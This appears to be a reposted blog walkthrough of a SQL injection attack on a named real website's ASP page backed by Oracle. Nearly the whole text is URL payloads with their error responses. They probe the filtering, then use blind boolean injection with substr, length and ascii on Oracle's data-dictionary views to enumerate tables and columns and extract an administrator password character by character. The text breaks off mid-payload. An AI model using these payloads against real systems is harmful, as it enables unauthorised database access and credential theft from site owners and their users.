Injection of ASP + ORACLE

xiaoxiao2021-03-06  69

An injection into an ASP + Oracle site.

http://et.kpworld.com/star.asp?performer=马三立;
--------------------
OraOLEDB error '80040e14'
ORA-00911: invalid character
/star.asp, line 83
The semicolon is not stripped by the page: it reaches Oracle, which does not accept ';' inside a statement submitted through OCI/OLE DB. So ORA-00911 here means "no stacked queries", not that the application filters the character.

http://et.kpworld.com/star.asp?performer=马三立'
--------------------
OraOLEDB error '80004005'
ORA-01756: quoted string not properly terminated
/star.asp, line 83
The single quote is not filtered either.

http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
--------------------
Close his quote and the page comes back normally. (Every later payload goes in the same place, appended to performer=马三立; only the injected part is shown from here on.)

and 0<>(select count(*) from admin) and '1'='1
--------------------
OraOLEDB error '80040e37'
ORA-00942: table or view does not exist
/star.asp, line 83
No table named admin.

********************
select table_name from user_tables                                  -- every table owned by the current user
select column_name from user_tab_columns where table_name='<table>'  -- every column of that table
********************

and 0<>(select count(*) from all_tables) and '1'='1
--------------------
Exists. all_tables is the data-dictionary view listing every table the current user can see, its own and other users'.

and 0<>(select count(*) from user_tables) and '1'='1
--------------------
Returns normally.

With this view we have the current user's own tables.

and 0<>(select top 1 table_name from user_tables) and '1'='1
--------------------
OraOLEDB error '80040e14'
ORA-00923: FROM keyword not found where expected
/star.asp, line 83
TOP 1 is T-SQL, not Oracle, and is rejected (PinKeyes had already tested that TOP 1 is unsupported; Oracle uses ROWNUM for this).

and 0<>(select count(*) from user_tables where table_nam<>) and '1'='1
--------------------
OraOLEDB error '80040e14'
ORA-00904: invalid column name
/star.asp, line 83
The misspelled column name is reported before the syntax error, so ORA-00904 answers "does this column exist?".

and 0<>(select count(*) from user_tables where table_name<>'') and '1'='1
--------------------
Syntactically correct and runs without error; the doubled quotes ('') are how an empty string is written inside a quoted literal. Note that in Oracle '' is the same as NULL, so table_name<>'' matches no rows and count(*) is 0; what this probe proves is only that the syntax is accepted.

Next, some function tests:

and 0<>(select count(*) from user_tables where sum(table_name)>1) and '1'='1
--------------------
OraOLEDB error '80040e14'
ORA-00934: group function is not allowed here
/star.asp, line 83

and 0<>(select count(*) from user_tables where avg(table_name)) and '1'='1
--------------------
OraOLEDB error '80040e14'
ORA-00934: group function is not allowed here
/star.asp, line 83
Aggregate functions cannot be used in a WHERE clause.

and 0<>(select table_name from user_tables) and '1'='1
--------------------
OraOLEDB error '80004005'
ORA-01427: single-row subquery returns more than one row
/star.asp, line 83
The subquery returns more than one row and cannot be compared directly; hence count(*) everywhere below.

and 0<>(select count(*) from user_tables where table_name 1) and '1'='1
--------------------
OraOLEDB error '80040e14'
ORA-00920: invalid relational operator
/star.asp, line 83

Enough error probing. Now to get at his tables:

and 0<>(select count(*) from performer) and '1'='1
--------------------
Returns normally. The table name was guessed from the parameter name in the URL.

and 0<>(select count(*) from user_tables where table_name='performer') and '1'='1
--------------------
Does not return: failure.

and 0<>(select count(*) from user_tables where table_name='PERFORMER') and '1'='1
--------------------
Success! user_tables only knows the name in upper case: Oracle upper-cases unquoted identifiers when it stores them in the data dictionary, so every comparison against table_name or column_name below uses upper-case literals (the table itself can still be referenced as performer).

and 0<>(select count(*) from user_tables where length(table_name)>10) and '1'='1
--------------------
Using length() to find how long the longest table name is.

and 0<>(select count(*) from user_tables where length(table_name)=18) and '1'='1
--------------------
Skipping the intermediate steps: the longest table name is 18 characters.

and 0<>(select count(*) from user_tables where substr(table_name,1,1)='A') and '1'='1
--------------------
The first character is 'A'.

and 0<>(select count(*) from user_tables where substr(table_name,1,2)='AD') and '1'='1
--------------------
The first two are 'AD'.

and 0<>(select count(*) from user_tables where substr(table_name,1,18)='ADMINAUTHORIZATION') and '1'='1
--------------------
Skipping ahead: the 18-character name is 'ADMINAUTHORIZATION'.

and 1=(select count(*) from user_tables where table_name='ADMINAUTHORIZATION') and '1'='1
--------------------
Returns.

and 0<>(select count(*) from user_tables where length(table_name)=2) and '1'='1
--------------------
The shortest table name is 2 characters.

and 0<>(select count(*) from user_tables where table_name like '%user%') and '1'='1
--------------------
Does not return.

and 0<>(select count(*) from user_tables where table_name like '%ADMIN%') and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%PER%') and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%BBS%') and '1'='1
--------------------
Returns normally, so LIKE can be used for guessing. (In the URL the '%' wildcard has to be sent as %25, as in like%20'%25BBS%25'; a bare '%' is read as the start of a URL escape and the pattern is mangled before it reaches the query.)

and 0<>(select count(*) from user_tables where table_name like '%BBS%' and length(table_name)>8) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%BBS%' and length(table_name)>10) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%BBS%' and length(table_name)=10) and '1'='1
--------------------
Combining LIKE with LENGTH pins the length down right away.

and 0<>(select count(*) from user_tables where substr(table_name,1,4)='BBSS') and '1'='1
--------------------
The fourth character is S. From here on it is repetitive labour.

and 0<>(select count(*) from user_tables where substr(table_name,1,10)='BBSSUBJECT') and '1'='1
--------------------
Guessed: 'BBSSUBJECT'.

and 0<>(select count(*) from user_tab_columns where table_name='BBSSUBJECT' and column_name like '%USER%') and '1'='1
--------------------
Does not return. This does not look like the table that holds users and passwords. Again...

and 0<>(select count(*) from user_tables where table_name like '%USER%') and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%USER%' and length(table_name)>10) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%USER%' and length(table_name)>15) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name like '%USER%' and length(table_name)=15) and '1'='1
--------------------
The length is 15.

and 0<>(select count(*) from user_tables where substr(table_name,1,1)='U' and length(table_name)=15) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where substr(table_name,2,1)='S' and length(table_name)=15) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where substr(table_name,-4,4)='USER' and length(table_name)=15) and '1'='1
--------------------
and 0<>(select count(*) from user_tables where length(table_name)=15 and substr(table_name,-15,15)='UNSUBSCRIBEUSER') and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name='UNSUBSCRIBEUSER') and '1'='1
--------------------
Name confirmed: 'UNSUBSCRIBEUSER' (a negative start position makes substr count from the end of the string, which is how the suffix was matched). Next, guess whether it has a password column...

and 0<>(select count(*) from user_tab_columns where table_name='UNSUBSCRIBEUSER' and column_name like '%USER%') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='UNSUBSCRIBEUSER' and column_name like '%PASS%') and '1'='1
--------------------
LIKE '%PASS%' does not return. Frustrating; carry on.

and 0<>(select count(*) from user_tab_columns where column_name like '%PASS%' and length(table_name)=13) and '1'='1
--------------------
Returns. With the table_name filter dropped, some table with a 13-character name has a column containing PASS, though this alone does not say which table.

and 0<>(select count(*) from user_tab_columns where substr(column_name,-2,2)='SS') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where substr(column_name,6,2)='SS') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where substr(column_name,4,4)='PASS') and '1'='1
--------------------
Switching to SUBSTR here.

and 0<>(select count(*) from user_tab_columns where substr(column_name,4,4)='PASS' and length(column_name)=11) and '1'='1
--------------------
The PASS column is 11 characters long: 3 characters before PASS, PASS at positions 4 to 7, and 4 more after it, 11 in all.

and 0<>(select count(*) from user_tab_columns where substr(column_name,4,8)='PASSWORD') and '1'='1
--------------------
Guessed, and it really is.

and 0<>(select count(*) from user_tab_columns where substr(column_name,-11,11)='STRPASSWORD') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where column_name='STRPASSWORD') and '1'='1
--------------------
Both return: the password column is 'STRPASSWORD'. With the column name in hand, use it to go after the table it belongs to:

and 0<>(select count(*) from user_tab_columns where column_name='STRPASSWORD' and length(table_name)=13) and '1'='1
--------------------
Returns, and the table-name length agrees with the earlier guess of 13.

Guess the name with SUBSTR:

and 0<>(select count(*) from user_tab_columns where column_name='STRPASSWORD' and substr(table_name,1,13)='ADMINISTRATOR') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where column_name='STRPASSWORD' and table_name='ADMINISTRATOR') and '1'='1
--------------------
and 0<>(select count(*) from user_tables where table_name='ADMINISTRATOR') and '1'='1
--------------------
All return: the table is 'ADMINISTRATOR'.

and 8=(select count(*) from user_tab_columns where table_name='ADMINISTRATOR') and '1'='1
--------------------
The table has 8 columns.

and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and column_name like '%ID%') and '1'='1
--------------------
and 3=(select count(*) from administrator) and '1'='1
--------------------
Three rows in the table.

and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,4,2)='ID') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,-2,2)='ID') and '1'='1
--------------------
So a column ends in ID and is 5 characters long.

and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,-5,5)='LNGID') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and column_name='LNGID') and '1'='1
--------------------
Out it comes: LNGID.

and 0<>(select count(*) from administrator where length(lngid)=2) and '1'='1
--------------------
and 8=(select min(lngid) from administrator) and '1'='1
--------------------
and 21=(select max(lngid) from administrator) and '1'='1
--------------------
Smallest and largest ID found. Next, the password:

and 0<>(select count(*) from administrator where length(strpassword)=4 and lngid=8) and '1'='1
--------------------
and 0<>(select count(*) from administrator where ascii(substr(strpassword,1,1))=116 and lngid=8) and '1'='1
--------------------
First character (116 is 't').

and 0<>(select count(*) from administrator where ascii(substr(strpassword,2,1))=101 and lngid=8) and '1'='1
--------------------
Second character (101 is 'e').

and 0<>(select count(*) from administrator where ascii(substr(strpassword,3,1))=115 and lngid=8) and '1'='1
--------------------
Third character (115 is 's').

and 0<>(select count(*) from administrator where ascii(substr(strpassword,4,1))=116 and lngid=8) and '1'='1
--------------------
Fourth character (116 is 't'). strpassword: test

and 0<>(select count(*) from administrator where strpassword='test' and lngid=8) and '1'='1
--------------------
Oh yeah, the password is out. (Comparing ascii() values instead of the character itself keeps the guessed character out of a quoted literal, so quotes, percent signs and other awkward characters in the value cause no trouble.)

Then the user name:

and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and column_name like '%NAME%') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,4,4)='NAME') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,-4,4)='NAME') and '1'='1
--------------------
and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and substr(column_name,1,7)='STRNAME') and '1'='1
--------------------
Out it comes: the column is STRNAME.

and 0<>(select count(*) from user_tab_columns where table_name='ADMINISTRATOR' and column_name not in ('STRNAME','STRPASSWORD','LNGID')) and '1'='1
--------------------
and 0<>(select count(*) from administrator where strpassword='test' and lngid=8 and length(strname)=4) and '1'=

Please credit the original when reposting: https://www.9cbs.com/read-90614.html
